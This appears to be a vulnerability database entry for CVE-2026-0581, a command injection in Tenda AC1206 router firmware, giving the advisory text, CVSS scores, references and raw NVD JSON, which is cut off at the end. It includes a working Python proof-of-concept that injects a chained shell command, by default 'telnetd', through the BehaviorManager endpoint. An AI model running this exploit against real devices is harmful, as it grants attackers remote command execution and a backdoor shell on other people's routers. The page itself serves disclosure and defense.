CVE-2026-0581

Description

A vulnerability was determined in Tenda AC1206 15.03.06.23. Affected by this issue is the function formBehaviorManager of the file /goform/BehaviorManager of the component httpd. Executing a manipulation of the argument modulename/option/data/switch can lead to command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:tenda:ac1206_firmware:15.03.06.23:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ac1206:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda AC1206 15.03.06.23

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-0581 PoC - Tenda AC1206 Command Injection
Affected: Tenda AC1206 Firmware 15.03.06.23
Vulnerable Endpoint: /goform/BehaviorManager
Vulnerable Parameters: modulename, option, data, switch
"""

import requests
import sys
import argparse

def exploit(target_ip, command):
    """
    Exploit command injection in Tenda AC1206
    """
    url = f"http://{target_ip}/goform/BehaviorManager"
    
    # Payload construction - inject command via 'data' parameter
    # Using semicolon to chain commands
    payload = f";{command}"
    
    data = {
        'modulename': 'test',
        'option': 'test',
        'data': payload,
        'switch': 'test'
    }
    
    try:
        print(f"[*] Sending exploit to {target_ip}")
        print(f"[*] Command: {command}")
        
        response = requests.post(url, data=data, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def main():
    parser = argparse.ArgumentParser(description='CVE-2026-0581 Exploit')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-c', '--command', default='telnetd', 
                        help='Command to execute (default: telnetd)')
    
    args = parser.parse_args()
    
    print("="*60)
    print("CVE-2026-0581 - Tenda AC1206 Command Injection")
    print("="*60)
    
    result = exploit(args.target, args.command)
    if result:
        print("\n[+] Exploit sent successfully")
        print(f"Response: {result[:200]}...")

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0581
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0581
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0581/
[4] VulDB https://vuldb.com/cve/CVE-2026-0581
[5] https://github.com/ccc-iotsec/cve-/blob/Tenda/Tenda%20AC1206%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
[6] https://vuldb.com/?ctiid.339473
[7] https://vuldb.com/?id.339473
[8] https://vuldb.com/?submit.731193
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0581", "sourceIdentifier": "[email protected]", "published": "2026-01-05T09:15:54.867", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Tenda AC1206 15.03.06.23. Affected by this issue is the function formBehaviorManager of the file /goform/BehaviorManager of the component httpd. Executing a manipulation of the argument modulename/option/data/switch can lead to command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en Tenda AC1206 15.03.06.23. Afectada por este problema es la función formBehaviorManager del archivo /goform/BehaviorManager del componente httpd. La ejecución de una manipulación del argumento modulename/option/data/switch puede conducir a una inyección de comandos. El ataque puede lanzarse de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac1206_firmware:15.03.06.23:*:*:*:*:*:*:*", "matchCriteriaId": "787A50A1-EDBC-44EB-8CF2-11C4FC63719D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac1206:-:*:*:*:*:*:*:*", "matchCriteriaId": "29D5013D-520A-461A-95FF-43B2BE160F91"}]}]}], "references": [{"url": "https://github.com/ccc-iotsec/cve-/blob/Tenda/Tenda%20AC1206%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md", "source": "[email protected]", "tags": ["Exploit", "Third P ... (truncated)